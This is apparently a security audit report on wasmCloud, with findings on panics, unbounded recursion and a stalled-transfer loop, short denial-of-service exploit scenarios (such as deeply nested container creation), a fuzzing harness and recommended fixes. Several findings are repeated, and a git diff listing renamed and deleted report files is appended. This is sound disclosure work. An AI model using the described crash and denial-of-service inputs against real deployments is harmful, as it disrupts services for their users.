overflow while enumerating containers in blobstore-fs Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WACL-2 Target: capability-providers/blobstore-fs/src/fs_utils.rs Description The all_dirs function is vulnerable to a stack overflow caused by unbounded recursion, triggered by either the presence of circular symlinks inside the root of the blobstore (as configured during startup), or the presence of excessively nested directory inside the same. Because this function is used by FsProvider::list_containers , this issue would result in a denial of service for all actors that use the method exposed by affected blobstores. let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs Figure 2.1: capability-providers/blobstore-fs/src/fs_utils.rs#L24-L30 Exploit Scenario An attacker creates a circular symlink inside the storage directory. Alternatively, an attacker can—under the right circumstances—create successively nested directories with a sufficient depth to cause a stack overflow. blobstore.create_container(ctx, &"a".to_string()). await ?; blobstore.create_container(ctx, &"a/a".to_string()). await ?; blobstore.create_container(ctx, &"a/a/a".to_string()). await ?; ... blobstore.create_container(ctx, &"a/a/a/.../a/a/a".to_string()). await ?; blobstore.list_containers(). await ?; Figure 2.2: Possible attack to a vulnerable blobstore In practice, this attack requires the underlying file system to allow exceptionally long filenames, and we have not been able to produce a working attack payload. However, this does not prove that no such file systems exist or will exist in the future. Recommendations Short term, limit the amount of allowable recursion depth to ensure that no stack overflow attack is possible given realistic stack sizes, as shown in figure 2.3. pub fn all_dirs(root: &Path, prefix: &Path, depth: i32 ) -> Vec { if depth > 1000 { return vec![]; } ... // Now recursively go in all directories and collect all sub-directories let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs( prefix.join(dir.as_path()).as_path(), prefix, depth + 1 ); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs } Figure 2.3: Limiting the amount of allowable recursion depth Long term, consider limiting the reliance on the underlying file system to a minimum by disallowing nesting containers. For example, Base64-encode all container and object names before passing them down to the file system routines. References ● OWASP Denial of Service Cheat Sheet ("Input validation" section) +3. Denial of service in blobstore-s3 using malicious actor Severity: Undetermined Difficulty: High Type: Data Validation Finding ID: TOB-WACL-3 Target: capability-providers/blobstore-s3/src/lib.rs Description The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the amount of bytes that have been sent by the call. An attacker could send specially crafted responses that cause stream_bytes to continue looping, causing send_chunk to report that no errors were detected while also reporting that no bytes were sent. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self .send_chunk ( ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize] .to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }, ) .await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker can send a maliciously crafted request to get an object from a blobstore-s3 provider, then send successful responses without making actual progress in the transfer by reporting that empty-sized chunks were received. Recommendations Make send_chunk report a failure if a zero-sized response is received. +4. Unexpected panic in validate_token Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-WACL-4 Target: wascap/src/jwt.rs Description The validate_token function from the wascap library panics with an out-of-bounds error when input is given in an unexpected format. The function expects the input to be a valid JWT token with three segments separated by a dot (figure 4.1). This implicit assumption is satisfied in the code; however, the function is public and does not mention the assumption in its documentation. /// Validates a signed JWT. This will check the signature, expiration time, and not-valid-before time pub fn validate_token (input: &str ) -> Result where T: Serialize + DeserializeOwned + WascapEntity, { } let segments: Vec <& str > = input.split( '.' ).collect(); let header_and_claims = format! ( "{}.{}" , segments[ 0 ] , segments[ 1 ] ); let sig = base64::decode_config( segments[ 2 ] , base64::URL_SAFE_NO_PAD)?; ... Figure 4.1: wascap/src/jwt.rs#L612-L641 Exploit Scenario A developer uses the validate_token function expecting it to fully validate the token string. The function receives an untrusted malicious input that forces the program to panic. Recommendations Short term, add input format validation before accessing the segments and a test case with malformed input. Long term, always validate all inputs to functions or document the input assumptions if validation is not in place for a specific reason. +1. Out-of-bounds crash in extract_claims Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-WACL-1 Target: wascap/src/wasm.rs Description The strip_custom_section function does not sufficiently validate data and crashes when the range is not within the buffer (figure 1.1). The function is used in the extract_claims function and is given an untrusted input. In the wasmCloud-otp , even though extract_claims is called as an Erlang NIF (Native Implemented Function) and potentially could bring down the VM upon crashing, the panic is handled gracefully by the Rustler library, resulting in an isolated crash of the Elixir process. if let Some ((id, range )) = payload.as_section() { wasm_encoder::RawSection { id, data: & buf [range] , } .append_to(& mut output); } Figure 1.1: wascap/src/wasm.rs#L161-L167 We found this issue by fuzzing the extract_claims function with cargo-fuzz (figure 2.1). #![no_main] use libfuzzer_sys::fuzz_target; use getrandom::register_custom_getrandom; // TODO: the program won’t compile without this, why? fn custom_getrandom (buf: & mut [ u8 ]) -> Result <(), getrandom::Error> { return Ok (()); } register_custom_getrandom!(custom_getrandom); fuzz_target!(|data: & [ u8 ]| { let _ = wascap::wasm::extract_claims(data); }); Figure 1.2: A simple extract_claims fuzzing harness that passes the fuzzer-provided bytes straight to the function After fixing the issue (figure 1.3), we fuzzed the function for an extended period of time; however, we found no additional issues. if let Some ((id, range)) = payload.as_section() { if range.end <= buf.len() { wasm_encoder::RawSection { id, data: & buf [range], } .append_to(& mut output); } else { return Err (errors::new(ErrorKind::InvalidCapability)); } } Figure 1.3: The fix we applied to continue fuzzing extract_claims . The code requires a new error value because we reused one of the existing ones that likely does not match the semantics. Exploit Scenario An attacker deploys a new module with invalid claims. While decoding the claims, the extract_claims function panics and crashes the Elixir process. Recommendations Short term, fix the strip_custom_section function by adding the range check, as shown in the figure 1.3. Add the extract_claims fuzzing harness to the wascap repository and run it for an extended period of time before each release of the library. Long term, add a fuzzing harness for each Rust function that processes user-provided data. References ● Erlang - NIFs +2. Stack overflow while enumerating containers in blobstore-fs Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WACL-2 Target: capability-providers/blobstore-fs/src/fs_utils.rs Description The all_dirs function is vulnerable to a stack overflow caused by unbounded recursion, triggered by either the presence of circular symlinks inside the root of the blobstore (as configured during startup), or the presence of excessively nested directory inside the same. Because this function is used by FsProvider::list_containers , this issue would result in a denial of service for all actors that use the method exposed by affected blobstores. let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs Figure 2.1: capability-providers/blobstore-fs/src/fs_utils.rs#L24-L30 Exploit Scenario An attacker creates a circular symlink inside the storage directory. Alternatively, an attacker can—under the right circumstances—create successively nested directories with a sufficient depth to cause a stack overflow. blobstore.create_container(ctx, &"a".to_string()). await ?; blobstore.create_container(ctx, &"a/a".to_string()). await ?; blobstore.create_container(ctx, &"a/a/a".to_string()). await ?; ... blobstore.create_container(ctx, &"a/a/a/.../a/a/a".to_string()). await ?; blobstore.list_containers(). await ?; Figure 2.2: Possible attack to a vulnerable blobstore In practice, this attack requires the underlying file system to allow exceptionally long filenames, and we have not been able to produce a working attack payload. However, this does not prove that no such file systems exist or will exist in the future. Recommendations Short term, limit the amount of allowable recursion depth to ensure that no stack overflow attack is possible given realistic stack sizes, as shown in figure 2.3. pub fn all_dirs(root: &Path, prefix: &Path, depth: i32 ) -> Vec { if depth > 1000 { return vec![]; } ... // Now recursively go in all directories and collect all sub-directories let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs( prefix.join(dir.as_path()).as_path(), prefix, depth + 1 ); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs } Figure 2.3: Limiting the amount of allowable recursion depth Long term, consider limiting the reliance on the underlying file system to a minimum by disallowing nesting containers. For example, Base64-encode all container and object names before passing them down to the file system routines. References ● OWASP Denial of Service Cheat Sheet ("Input validation" section) +3. Denial of service in blobstore-s3 using malicious actor Severity: Undetermined Difficulty: High Type: Data Validation Finding ID: TOB-WACL-3 Target: capability-providers/blobstore-s3/src/lib.rs Description The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the amount of bytes that have been sent by the call. An attacker could send specially crafted responses that cause stream_bytes to continue looping, causing send_chunk to report that no errors were detected while also reporting that no bytes were sent. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self .send_chunk ( ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize] .to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }, ) .await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker can send a maliciously crafted request to get an object from a blobstore-s3 provider, then send successful responses without making actual progress in the transfer by reporting that empty-sized chunks were received. Recommendations Make send_chunk report a failure if a zero-sized response is received. +4. Unexpected panic in validate_token Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-WACL-4 Target: wascap/src/jwt.rs Description The validate_token function from the wascap library panics with an out-of-bounds error when input is given in an unexpected format. The function expects the input to be a valid JWT token with three segments separated by a dot (figure 4.1). This implicit assumption is satisfied in the code; however, the function is public and does not mention the assumption in its documentation. /// Validates a signed JWT. This will check the signature, expiration time, and not-valid-before time pub fn validate_token (input: &str ) -> Result where T: Serialize + DeserializeOwned + WascapEntity, { } let segments: Vec <& str > = input.split( '.' ).collect(); let header_and_claims = format! ( "{}.{}" , segments[ 0 ] , segments[ 1 ] ); let sig = base64::decode_config( segments[ 2 ] , base64::URL_SAFE_NO_PAD)?; ... Figure 4.1: wascap/src/jwt.rs#L612-L641 Exploit Scenario A developer uses the validate_token function expecting it to fully validate the token string. The function receives an untrusted malicious input that forces the program to panic. Recommendations Short term, add input format validation before accessing the segments and a test case with malformed input. Long term, always validate all inputs to functions or document the input assumptions if validation is not in place for a specific reason. +5. Incorrect error message when starting actor from file Severity: Informational Difficulty: Low Type: Error Reporting Finding ID: TOB-WACL-5 Target: host_core/lib/host_core/actors/actor_supervisor.ex Description The error message when starting an actor from a file contains a string interpolation bug that causes the message to not include the fileref content (figure 5.1). This causes the error message to contain the literal string ${fileref} instead. It is worth noting that the fileref content will be included anyway as an attribute. Logger .error( "Failed to read actor file from ${fileref} : #{ inspect(err) } " , fileref : fileref ) Figure 5.1: host_core/lib/host_core/actors/actor_supervisor.ex#L301 Recommendations Short term, change the error message to correctly interpolate the fileref string. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Configuration The configuration of system components in accordance with best practices Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On October 4, 2023, reviewed the fixes and mitigations implemented by the wasmCloud team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, wasmCloud has resolved all identified issues. For additional information, please see the Detailed Fix Review Results below. ID Title 1 Out of bounds crash in extract_claims Status Resolved 2 Stack overflow while enumerating containers in blobstore-fs Resolved 3 Denial of Service in blobstore-s3 using malicious actor Resolved Detailed Fix Review Results TOB-WACL-1: Out of bounds crash in extract_claims Resolved in commit 664d9b9 . The missing range validation was added. TOB-WACL-2: Stack overflow while enumerating containers in blobstore-fs Resolved in PR capability-providers/271 . The fix limits the recursion to a maximum of 1,000 calls. TOB-WACL-3: Denial of Service in blobstore-s3 using malicious actor Resolved in PR capability-providers/271 . The missing response emptiness check was added. TOB-WACL-4: Unexpected panic in validate_token Resolved in PR wascap/52 . The missing segments quantity validation was added. TOB-WACL-5: Incorrect error message when starting actor from file Resolved in PR wasmcloud-otp/648 . The mistake in message log string interpolation was fixed. D. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/API3.txt b/findings_newupdate/tob/API3.txt similarity index 100% rename from findings_newupdate/API3.txt rename to findings_newupdate/tob/API3.txt diff --git a/findings_newupdate/AdvancedBlockchainQ12022.txt b/findings_newupdate/tob/AdvancedBlockchainQ12022.txt similarity index 100% rename from findings_newupdate/AdvancedBlockchainQ12022.txt rename to findings_newupdate/tob/AdvancedBlockchainQ12022.txt diff --git a/findings_newupdate/AnteProtocol.txt b/findings_newupdate/tob/AnteProtocol.txt similarity index 100% rename from findings_newupdate/AnteProtocol.txt rename to findings_newupdate/tob/AnteProtocol.txt diff --git a/findings_newupdate/CoreDNS.txt b/findings_newupdate/tob/CoreDNS.txt similarity index 100% rename from findings_newupdate/CoreDNS.txt rename to findings_newupdate/tob/CoreDNS.txt diff --git a/findings_newupdate/DFINITYCanisterSandbox.txt b/findings_newupdate/tob/DFINITYCanisterSandbox.txt similarity index 100% rename from findings_newupdate/DFINITYCanisterSandbox.txt rename to findings_newupdate/tob/DFINITYCanisterSandbox.txt diff --git a/findings_newupdate/DFINITYThresholdECDSAandBtcCanisters.txt b/findings_newupdate/tob/DFINITYThresholdECDSAandBtcCanisters.txt similarity index 100% rename from findings_newupdate/DFINITYThresholdECDSAandBtcCanisters.txt rename to findings_newupdate/tob/DFINITYThresholdECDSAandBtcCanisters.txt diff --git a/findings_newupdate/DeGate.txt b/findings_newupdate/tob/DeGate.txt similarity index 100% rename from findings_newupdate/DeGate.txt rename to findings_newupdate/tob/DeGate.txt diff --git a/findings_newupdate/FraxQ22022.txt b/findings_newupdate/tob/FraxQ22022.txt similarity index 100% rename from findings_newupdate/FraxQ22022.txt rename to findings_newupdate/tob/FraxQ22022.txt diff --git a/findings_newupdate/FraxQ42021.txt b/findings_newupdate/tob/FraxQ42021.txt similarity index 100% rename from findings_newupdate/FraxQ42021.txt rename to findings_newupdate/tob/FraxQ42021.txt diff --git a/findings_newupdate/FujiProtocol.txt b/findings_newupdate/tob/FujiProtocol.txt similarity index 100% rename from findings_newupdate/FujiProtocol.txt rename to findings_newupdate/tob/FujiProtocol.txt diff --git a/findings_newupdate/Galoy.txt b/findings_newupdate/tob/Galoy.txt similarity index 100% rename from findings_newupdate/Galoy.txt rename to findings_newupdate/tob/Galoy.txt diff --git a/findings_newupdate/Linkerd-securityreview.txt b/findings_newupdate/tob/Linkerd-securityreview.txt similarity index 100% rename from findings_newupdate/Linkerd-securityreview.txt rename to findings_newupdate/tob/Linkerd-securityreview.txt diff --git a/findings_newupdate/Linkerd-threatmodel.txt b/findings_newupdate/tob/Linkerd-threatmodel.txt similarity index 100% rename from findings_newupdate/Linkerd-threatmodel.txt rename to findings_newupdate/tob/Linkerd-threatmodel.txt diff --git a/findings_newupdate/LooksRare.txt b/findings_newupdate/tob/LooksRare.txt similarity index 100% rename from findings_newupdate/LooksRare.txt rename to findings_newupdate/tob/LooksRare.txt diff --git a/findings_newupdate/MapleFinance.txt b/findings_newupdate/tob/MapleFinance.txt similarity index 100% rename from findings_newupdate/MapleFinance.txt rename to findings_newupdate/tob/MapleFinance.txt diff --git a/findings_newupdate/MesonProtocolFixReview.txt b/findings_newupdate/tob/MesonProtocolFixReview.txt similarity index 100% rename from findings_newupdate/MesonProtocolFixReview.txt rename to findings_newupdate/tob/MesonProtocolFixReview.txt diff --git a/findings_newupdate/Microsoft-go-cose.txt b/findings_newupdate/tob/Microsoft-go-cose.txt similarity index 100% rename from findings_newupdate/Microsoft-go-cose.txt rename to findings_newupdate/tob/Microsoft-go-cose.txt diff --git a/findings_newupdate/MorphoLabs.txt b/findings_newupdate/tob/MorphoLabs.txt similarity index 100% rename from findings_newupdate/MorphoLabs.txt rename to findings_newupdate/tob/MorphoLabs.txt diff --git a/findings_newupdate/NFTX.txt b/findings_newupdate/tob/NFTX.txt similarity index 100% rename from findings_newupdate/NFTX.txt rename to findings_newupdate/tob/NFTX.txt diff --git a/findings_newupdate/ParallelFinance.txt b/findings_newupdate/tob/ParallelFinance.txt similarity index 100% rename from findings_newupdate/ParallelFinance.txt rename to findings_newupdate/tob/ParallelFinance.txt diff --git a/findings_newupdate/ParallelFinance2.txt b/findings_newupdate/tob/ParallelFinance2.txt similarity index 100% rename from findings_newupdate/ParallelFinance2.txt rename to findings_newupdate/tob/ParallelFinance2.txt diff --git a/findings_newupdate/ParallelFinance3.txt b/findings_newupdate/tob/ParallelFinance3.txt similarity index 100% rename from findings_newupdate/ParallelFinance3.txt rename to findings_newupdate/tob/ParallelFinance3.txt diff --git a/findings_newupdate/Primitive.txt b/findings_newupdate/tob/Primitive.txt similarity index 100% rename from findings_newupdate/Primitive.txt rename to findings_newupdate/tob/Primitive.txt diff --git a/findings_newupdate/RocketPool.txt b/findings_newupdate/tob/RocketPool.txt similarity index 100% rename from findings_newupdate/RocketPool.txt rename to findings_newupdate/tob/RocketPool.txt diff --git a/findings_newupdate/ShellProtocolv2.txt b/findings_newupdate/tob/ShellProtocolv2.txt similarity index 100% rename from findings_newupdate/ShellProtocolv2.txt rename to findings_newupdate/tob/ShellProtocolv2.txt diff --git a/findings_newupdate/Sherlockv2.txt b/findings_newupdate/tob/Sherlockv2.txt similarity index 100% rename from findings_newupdate/Sherlockv2.txt rename to findings_newupdate/tob/Sherlockv2.txt diff --git a/findings_newupdate/SimpleXChat.txt b/findings_newupdate/tob/SimpleXChat.txt similarity index 100% rename from findings_newupdate/SimpleXChat.txt rename to findings_newupdate/tob/SimpleXChat.txt diff --git a/findings_newupdate/Tekton.txt b/findings_newupdate/tob/Tekton.txt similarity index 100% rename from findings_newupdate/Tekton.txt rename to findings_newupdate/tob/Tekton.txt diff --git a/findings_newupdate/Umee.txt b/findings_newupdate/tob/Umee.txt similarity index 100% rename from findings_newupdate/Umee.txt rename to findings_newupdate/tob/Umee.txt diff --git a/findings_newupdate/YieldV2.txt b/findings_newupdate/tob/YieldV2.txt similarity index 100% rename from findings_newupdate/YieldV2.txt rename to findings_newupdate/tob/YieldV2.txt diff --git a/findings_newupdate/osquery.txt b/findings_newupdate/tob/osquery.txt similarity index 100% rename from findings_newupdate/osquery.txt rename to findings_newupdate/tob/osquery.txt diff --git a/pdfs/0x-protocol.pdf b/pdfs/0x-protocol.pdf deleted file mode 100644 index 7c52ee8..0000000 Binary files a/pdfs/0x-protocol.pdf and /dev/null differ diff --git a/pdfs/2022-07-mobilecoin-securityreview.pdf b/pdfs/2022-07-mobilecoin-securityreview.pdf deleted file mode 100644 index f063d8d..0000000 Binary files a/pdfs/2022-07-mobilecoin-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf b/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf deleted file mode 100644 index d1560ee..0000000 Binary files a/pdfs/2022-09-aleosystems-snarkvm-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf b/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf deleted file mode 100644 index f5e4fed..0000000 Binary files a/pdfs/2022-09-alphasoc-alphasocapi-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-incrementprotocol-fixreview.pdf b/pdfs/2022-09-incrementprotocol-fixreview.pdf deleted file mode 100644 index b6cc6af..0000000 Binary files a/pdfs/2022-09-incrementprotocol-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-incrementprotocol-securityreview.pdf b/pdfs/2022-09-incrementprotocol-securityreview.pdf deleted file mode 100644 index 64a42a0..0000000 Binary files a/pdfs/2022-09-incrementprotocol-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf b/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf deleted file mode 100644 index 1acb0ac..0000000 Binary files a/pdfs/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf b/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf deleted file mode 100644 index 861d4fb..0000000 Binary files a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf b/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf deleted file mode 100644 index 573ae7a..0000000 Binary files a/pdfs/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-GSquared-fixreview.pdf b/pdfs/2022-10-GSquared-fixreview.pdf deleted file mode 100644 index 85fb04c..0000000 Binary files a/pdfs/2022-10-GSquared-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-GSquared-securityreview.pdf b/pdfs/2022-10-GSquared-securityreview.pdf deleted file mode 100644 index c7a01da..0000000 Binary files a/pdfs/2022-10-GSquared-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf b/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf deleted file mode 100644 index 4038586..0000000 Binary files a/pdfs/2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf b/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf deleted file mode 100644 index cfbc8c4..0000000 Binary files a/pdfs/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-shimacapital-ondo-fixreview.pdf b/pdfs/2022-10-shimacapital-ondo-fixreview.pdf deleted file mode 100644 index 180bfc4..0000000 Binary files a/pdfs/2022-10-shimacapital-ondo-fixreview.pdf and /dev/null differ diff --git a/pdfs/2022-10-shimacapital-ondo-securityreview.pdf b/pdfs/2022-10-shimacapital-ondo-securityreview.pdf deleted file mode 100644 index 0bd67c2..0000000 Binary files a/pdfs/2022-10-shimacapital-ondo-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-11-optimism-securityreview.pdf b/pdfs/2022-11-optimism-securityreview.pdf deleted file mode 100644 index e99d3d4..0000000 Binary files a/pdfs/2022-11-optimism-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-12-curl-securityreview.pdf b/pdfs/2022-12-curl-securityreview.pdf deleted file mode 100644 index 5df6ed8..0000000 Binary files a/pdfs/2022-12-curl-securityreview.pdf and /dev/null differ diff --git a/pdfs/2022-12-curl-threatmodel.pdf b/pdfs/2022-12-curl-threatmodel.pdf deleted file mode 100644 index 9f07983..0000000 Binary files a/pdfs/2022-12-curl-threatmodel.pdf and /dev/null differ diff --git a/pdfs/2023-01-keda-securityreview.pdf b/pdfs/2023-01-keda-securityreview.pdf deleted file mode 100644 index 5edc825..0000000 Binary files a/pdfs/2023-01-keda-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf b/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf deleted file mode 100644 index d87e8b6..0000000 Binary files a/pdfs/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf b/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf deleted file mode 100644 index 52434e4..0000000 Binary files a/pdfs/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf and /dev/null differ diff --git a/pdfs/2023-02-solana-token-2022-program-securityreview.pdf b/pdfs/2023-02-solana-token-2022-program-securityreview.pdf deleted file mode 100644 index 9ef7353..0000000 Binary files a/pdfs/2023-02-solana-token-2022-program-securityreview.pdf and /dev/null differ diff --git a/pdfs/88mph.pdf b/pdfs/88mph.pdf deleted file mode 100644 index 5657cbd..0000000 Binary files a/pdfs/88mph.pdf and /dev/null differ diff --git a/pdfs/API3.pdf b/pdfs/API3.pdf deleted file mode 100644 index a8d8701..0000000 Binary files a/pdfs/API3.pdf and /dev/null differ diff --git a/pdfs/AcalaNetwork.pdf b/pdfs/AcalaNetwork.pdf deleted file mode 100644 index 1e1a55f..0000000 Binary files a/pdfs/AcalaNetwork.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchain.pdf b/pdfs/AdvancedBlockchain.pdf deleted file mode 100644 index 62faaa2..0000000 Binary files a/pdfs/AdvancedBlockchain.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchainQ12022.pdf b/pdfs/AdvancedBlockchainQ12022.pdf deleted file mode 100644 index 63dad5d..0000000 Binary files a/pdfs/AdvancedBlockchainQ12022.pdf and /dev/null differ diff --git a/pdfs/AdvancedBlockchainQ42021.pdf b/pdfs/AdvancedBlockchainQ42021.pdf deleted file mode 100644 index b4d9730..0000000 Binary files a/pdfs/AdvancedBlockchainQ42021.pdf and /dev/null differ diff --git a/pdfs/AlephBFT.pdf b/pdfs/AlephBFT.pdf deleted file mode 100644 index ee8e56a..0000000 Binary files a/pdfs/AlephBFT.pdf and /dev/null differ diff --git a/pdfs/AnteProtocol.pdf b/pdfs/AnteProtocol.pdf deleted file mode 100644 index 850a161..0000000 Binary files a/pdfs/AnteProtocol.pdf and /dev/null differ diff --git a/pdfs/AnteProtocolFixReview.pdf b/pdfs/AnteProtocolFixReview.pdf deleted file mode 100644 index fc6ba7a..0000000 Binary files a/pdfs/AnteProtocolFixReview.pdf and /dev/null differ diff --git a/pdfs/BalancerCore.pdf b/pdfs/BalancerCore.pdf deleted file mode 100644 index 92b9f93..0000000 Binary files a/pdfs/BalancerCore.pdf and /dev/null differ diff --git a/pdfs/BeethovenXSummary.pdf b/pdfs/BeethovenXSummary.pdf deleted file mode 100644 index f50a06f..0000000 Binary files a/pdfs/BeethovenXSummary.pdf and /dev/null differ diff --git a/pdfs/CREAMSummary.pdf b/pdfs/CREAMSummary.pdf deleted file mode 100644 index 1dd4323..0000000 Binary files a/pdfs/CREAMSummary.pdf and /dev/null differ diff --git a/pdfs/CasperLabsHighwayProtocol.pdf b/pdfs/CasperLabsHighwayProtocol.pdf deleted file mode 100644 index c74c8aa..0000000 Binary files a/pdfs/CasperLabsHighwayProtocol.pdf and /dev/null differ diff --git a/pdfs/CasperLedger.pdf b/pdfs/CasperLedger.pdf deleted file mode 100644 index 497c8d7..0000000 Binary files a/pdfs/CasperLedger.pdf and /dev/null differ diff --git a/pdfs/CloudEvents.pdf b/pdfs/CloudEvents.pdf deleted file mode 100644 index b9664f3..0000000 Binary files a/pdfs/CloudEvents.pdf and /dev/null differ diff --git a/pdfs/CompliFi.pdf b/pdfs/CompliFi.pdf deleted file mode 100644 index e76a7f0..0000000 Binary files a/pdfs/CompliFi.pdf and /dev/null differ diff --git a/pdfs/CoreDNS.pdf b/pdfs/CoreDNS.pdf deleted file mode 100644 index 3dc88c4..0000000 Binary files a/pdfs/CoreDNS.pdf and /dev/null differ diff --git a/pdfs/CurveDAO.pdf b/pdfs/CurveDAO.pdf deleted file mode 100644 index ea6561b..0000000 Binary files a/pdfs/CurveDAO.pdf and /dev/null differ diff --git a/pdfs/DFINITY.pdf b/pdfs/DFINITY.pdf deleted file mode 100644 index 673091c..0000000 Binary files a/pdfs/DFINITY.pdf and /dev/null differ diff --git a/pdfs/DFINITYCanisterSandbox.pdf 